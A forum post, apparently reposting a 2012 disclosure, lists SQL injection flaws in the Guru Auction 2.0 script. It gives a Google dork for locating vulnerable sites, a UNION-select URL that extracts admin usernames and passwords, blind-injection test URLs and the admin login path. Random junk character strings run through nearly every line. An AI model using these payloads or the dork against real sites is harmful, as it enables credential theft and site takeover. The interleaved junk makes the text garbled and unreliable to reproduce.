Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
5 i5 L2 t: ]6 n3 a: g! U5 Q
. c) f- U+ B i z; l; Y1 ~$ C9 I作者 : v3n0m
$ O. {4 e5 _0 e s应用 : Guru Auction 2.0
* f( |3 o' u( z) |; oPrice : $49% S/ ]# O7 ], g4 B8 }! g; ^* E
Vendor : http://www.guruscript.com/4 a9 t- s5 S: b. o6 ?, [, _
Google Dork : inurl:subcat.php?cate_id=% }; X1 k2 K: M% f- u/ S
+ G8 S3 T& z$ r x' H3 |. ?- N
SQLi p0c:2 G, K1 Z1 ^/ a8 i7 j' b
~~~~~~~~~~
& ^/ B6 u# o; `2 qhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--* `6 Y D7 N7 Q e8 k& N! q2 a1 k
0 k" R6 F: U$ B0 y4 b6 x; v% L
) u7 c% e% \2 A$ |, j4 E盲注 p0c:1 l( b2 N$ Z, X, Q" ^1 s; R9 N7 `# Z. W
~~~~~~~~~~
7 F& ]/ N {& j1 S1 D& @$ rhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true& C. v5 A# h7 a/ ^. M; S, v7 C
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false7 j' ^4 \3 c; h6 G" n5 }& h: \. l
% C) J( U Q) Y; }- @
管理登录入口:
/ W: }' Z, M Y~~~~~~~~~~
2 N+ t Y. B3 i1 e7 h- h4 U3 ehttp://domain.tld/[path]/admin/- f" |. m. W% O( u$ F" T( N
|
发表于 2012-12-31 09:24:05
收藏
支持
反对